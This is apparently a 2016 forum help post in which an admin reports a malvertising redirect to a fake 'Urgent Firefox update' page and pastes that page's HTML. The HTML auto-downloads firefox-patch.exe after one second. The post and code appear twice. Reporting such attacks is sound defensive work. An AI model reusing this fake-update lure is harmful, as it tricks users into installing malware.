Post by branjita on Jun 25, 2016 10:33:00 GMT -8
Forum URL: www.dragonballfigures.com
(dragonballfigures.boards.net)
I was viewing a topic, and I was immediately redirected to an obviously fake Firefox update. Something is wrong. Please analyze my forum and see if there's something doing this! Is there a vulnerability in a plug-in? Or what?
It redirected me to eeliacoollib.org/3491813243346/93c90f1f6cbfd233e1b06d101e410297.html which attempts to immediately download "firefox-patch.exe"
I firmly believe this has everything to do with a banner ad on the page, and not with my computer. I've had another user report something similar here: dragonballfigures.com/thread/3123/forum-issue-directed-malware
I was attempting to view this page, and it obviously does not do this redirect every time, so I think it surely must be banner ad related, and this entirely smells malicious! dragonballfigures.com/thread/3133/best-dbz?page=1&scrollTo=98685
Code of the website:
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title></title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/PR1-2/css/normalize.css">
<link rel="stylesheet" href="/PR1-2/css/main.css">
<link href='https://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'>
<script src="/PR1-2/js/vendor/modernizr-2.6.2.min.js"></script>
</head>
<body>
<div class="container">
<h1>Urgent Firefox update</h1>
<a class="btn" href="/3491813243346/1466879334316883/firefox-patch.exe">Download Now</a>
</div>
<script>window.jQuery || document.write('<script src="/PR1-2/js/vendor/jquery-1.10.2.min.js"><\/script>')</script>
<script src="/PR1-2/js/plugins.js"></script>
<script src="/PR1-2/js/main.js"></script>
<script>
setTimeout("location.href = '3491813243346/1466879334316883/firefox-patch.exe';", 1000);
</script>
</body>
</html>
(dragonballfigures.boards.net)
I was viewing a topic, and I was immediately redirected to an obviously fake Firefox update. Something is wrong. Please analyze my forum and see if there's something doing this! Is there a vulnerability in a plug-in? Or what?
It redirected me to eeliacoollib.org/3491813243346/93c90f1f6cbfd233e1b06d101e410297.html which attempts to immediately download "firefox-patch.exe"
I firmly believe this has everything to do with a banner ad on the page, and not with my computer. I've had another user report something similar here: dragonballfigures.com/thread/3123/forum-issue-directed-malware
I was attempting to view this page, and it obviously does not do this redirect every time, so I think it surely must be banner ad related, and this entirely smells malicious! dragonballfigures.com/thread/3133/best-dbz?page=1&scrollTo=98685
Code of the website:
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="no-js lt-ie9 lt-ie8 lt-ie7"> <![endif]-->
<!--[if IE 7]> <html class="no-js lt-ie9 lt-ie8"> <![endif]-->
<!--[if IE 8]> <html class="no-js lt-ie9"> <![endif]-->
<!--[if gt IE 8]><!--> <html class="no-js"> <!--<![endif]-->
<head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<title></title>
<meta name="description" content="">
<meta name="viewport" content="width=device-width, initial-scale=1">
<link rel="stylesheet" href="/PR1-2/css/normalize.css">
<link rel="stylesheet" href="/PR1-2/css/main.css">
<link href='https://fonts.googleapis.com/css?family=Open+Sans:400,300' rel='stylesheet' type='text/css'>
<script src="/PR1-2/js/vendor/modernizr-2.6.2.min.js"></script>
</head>
<body>
<div class="container">
<h1>Urgent Firefox update</h1>
<a class="btn" href="/3491813243346/1466879334316883/firefox-patch.exe">Download Now</a>
</div>
<script>window.jQuery || document.write('<script src="/PR1-2/js/vendor/jquery-1.10.2.min.js"><\/script>')</script>
<script src="/PR1-2/js/plugins.js"></script>
<script src="/PR1-2/js/main.js"></script>
<script>
setTimeout("location.href = '3491813243346/1466879334316883/firefox-patch.exe';", 1000);
</script>
</body>
</html>
